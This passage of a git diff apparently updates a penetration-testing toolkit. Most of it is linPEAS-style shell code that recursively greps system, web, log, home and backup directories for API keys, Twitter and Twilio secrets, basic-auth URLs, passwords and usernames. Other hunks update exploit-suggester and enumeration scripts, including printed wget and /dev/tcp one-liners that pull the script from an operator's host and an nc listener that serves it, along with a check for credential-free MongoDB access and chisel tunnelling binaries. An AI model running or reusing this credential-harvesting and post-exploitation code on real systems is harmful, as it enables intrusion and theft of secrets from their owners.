0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sq0csp-[ 0-9A-Za-z_\-]{43}~${SED_RED}~" & +wait +print_3title "Searching Twilio API Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~SK[0-9a-fA-F]{32}~${SED_RED}~" & +wait +print_3title "Searching Twitter Client ID (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}~${SED_RED}~" & +wait +print_3title "Searching Twitter Oauth (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]~${SED_RED}~" & +wait +print_3title "Searching Twitter Secret Key (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}~${SED_RED}~" & +wait +echo '' +print_2title "Searching Misc" +print_3title "Searching Basic Auth (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~//(.+):(.+)@~${SED_RED}~" & +wait +print_3title "Searching Passwords1 (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)~${SED_RED}~" & +wait +print_3title "Searching Usernames (limited to 50)" +timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /etc -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /opt -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /tmp -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /private -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /Applications -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /var/www -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /var/log -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /private/var/log -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "username.*[=:].+" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~username.*[=:].+~${SED_RED}~" & +wait +echo '' + +fi +fi +echo '' +echo '' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh index 938c8e5..51582ce 100755 --- a/linux-exploit-suggester.sh +++ b/linux-exploit-suggester.sh @@ -1490,6 +1490,17 @@ exploit-db: https://www.exploit-db.com/exploits/41154 EOF ) +EXPLOITS_USERSPACE[((n++))]=$(cat < # GitHub: https://github.com/diego-treitos/linux-smart-enumeration # -lse_version="3.7" +lse_version="3.9" #( Colors # @@ -502,7 +502,8 @@ lse_serve() { cecho "${green} * ${white}wget ${reset} '$ip:$port' -O lse.sh; chmod 755 lse.sh\n" cecho "${green} * ${white}exec 3<>/dev/tcp/${reset}$ip/$port;printf '\\\\n'>&3;cat<&3>lse.sh;exec 3<&-;chmod 755 lse.sh\n" done - nc -l -q0 -p "$port" < "$0" >/dev/null + # try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional) + nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null } lse_header() { local id="$1" @@ -1262,6 +1263,11 @@ lse_run_tests_software() { "Can we write to screen session sockets from other users?" \ 'find /run/screen -type s -writable -regex "/run/screen/S-.+/.+" ! -user $lse_user -exec ls -l {} +' + #check connection to mongoDB + lse_test "sof170" "1" \ + "Can we access MongoDB databases without credentials?" \ + 'echo "show dbs" | mongo --quiet | grep -E "(admin|config|local)"' + #sudo version - check to see if there are any known vulnerabilities with this lse_test "sof500" "2" \ "Sudo version" \ diff --git a/util.py b/util.py index cad8ef7..a84509a 100755 --- a/util.py +++ b/util.py @@ -193,7 +193,7 @@ if __name__ == "__main__": output = set_exif_data(payload, _in, _out, tag) sys.stdout.buffer.write(output) sys.stdout.flush() - elif command == "help": + else: print("Usage: %s [command]" % bin) print("Available commands:") print(" help, getAddress, pad, exifImage") diff --git a/win/chisel.exe b/win/chisel.exe index b8b3d97..126c685 100644 Binary files a/win/chisel.exe and b/win/chisel.exe differ diff --git a/win/chisel64.exe b/win/chisel64.exe index 918ae09..f589cac 100644 Binary files a/win/chisel64.exe and b/win/chisel64.exe differ diff --git a/win/winPEAS.bat b/win/winPEAS.bat index 9f97875..31db1d3 100644 --- 